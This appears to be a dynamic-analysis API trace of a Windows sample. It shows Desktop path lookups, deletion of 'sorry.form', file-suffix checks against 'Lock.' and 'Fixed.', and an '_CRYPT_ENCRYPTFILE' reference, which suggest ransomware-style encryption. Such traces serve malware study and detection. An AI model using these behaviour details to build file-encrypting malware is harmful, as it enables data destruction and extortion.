HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0209.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0209.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0209.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0209.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0209.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0209.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0209.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0209.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0209.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0209.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0209.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0209.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0209.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0209.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0209.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0209.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0209.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0209.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0209.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0209.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0209.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0209.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0209.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0209.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0209.287] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0209.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0209.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0209.287] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0209.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0209.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0209.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0209.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0209.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0209.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0209.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0209.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0209.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0209.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0209.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0209.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0209.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0209.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0209.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0209.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0209.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x46) returned 0x2e563a8 [0209.288] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/sorry.form", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\sorry.form", lpFilePart=0x8cedf4*="sorry.form") returned 0x22 [0209.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0209.288] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\sorry.form" (normalized: "c:\\users\\fd1hvy\\desktop\\sorry.form")) returned 0x20 [0209.289] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\sorry.form", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd491219f, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xd491219f, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd4ab5b65, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0x113f94, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="sorry.form", cAlternateFileName="SORRY~1.FOR")) returned 0xa870d0 [0209.289] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\sorry.form" (normalized: "c:\\users\\fd1hvy\\desktop\\sorry.form")) returned 1 [0209.293] FindNextFileW (in: hFindFile=0xa870d0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd491219f, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xd491219f, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd4ab5b65, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0x113f94, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="sorry.form", cAlternateFileName="SORRY~1.FOR")) returned 0 [0209.293] FindClose (in: hFindFile=0xa870d0 | out: hFindFile=0xa870d0) returned 1 [0209.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0209.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0209.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0209.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0209.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0209.293] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0209.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0209.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0209.293] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0209.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0209.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0209.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0209.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0209.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0209.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0209.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0209.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0209.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0209.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0209.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0209.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0209.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0209.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0209.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0209.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0209.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0209.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0209.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0209.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x46) returned 0x2e563a8 [0209.294] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/sorry.form", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\sorry.form", lpFilePart=0x8cf650*="sorry.form") returned 0x22 [0209.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0209.298] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\sorry.form" (normalized: "c:\\users\\fd1hvy\\desktop\\sorry.form")) returned 0xffffffff [0209.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0209.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0209.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0209.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0209.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0209.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0209.298] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0209.298] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.298] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0209.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0209.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0209.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0209.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0209.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0209.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0209.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0209.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0209.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0209.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0209.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0209.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0209.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VstT.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="stT.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tT.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0209.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0209.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0209.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0209.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0209.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0209.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0209.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0209.299] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0209.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0209.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0209.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0209.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0209.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0209.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0209.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0209.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0209.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0209.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0209.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0209.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0209.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0209.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0209.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0209.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0209.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0209.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x12) returned 0x2e69b08 [0209.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0209.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VstT.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="stT.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tT.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0209.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0209.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0209.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0209.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0209.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0209.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0209.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0209.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0209.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0209.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0209.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0209.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0209.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0209.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0209.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0209.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0209.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0209.301] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0209.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0209.301] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0209.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0209.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0209.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0209.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c78 [0209.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0209.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0209.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0209.301] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0209.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0209.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0209.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0209.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0209.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0209.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0209.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0209.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0209.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0209.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0209.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0209.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0209.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0209.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0209.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0209.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0209.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b28 [0209.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0209.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0209.306] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0209.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0209.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0209.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0209.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0209.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0209.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0209.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0209.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0209.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0209.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0209.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0209.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0209.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0209.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0209.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ba8 [0209.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0209.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0209.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0209.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0209.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cf8 [0209.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0209.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0209.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0209.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53878 [0209.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0209.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0209.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0209.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0209.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0209.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0209.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0209.307] 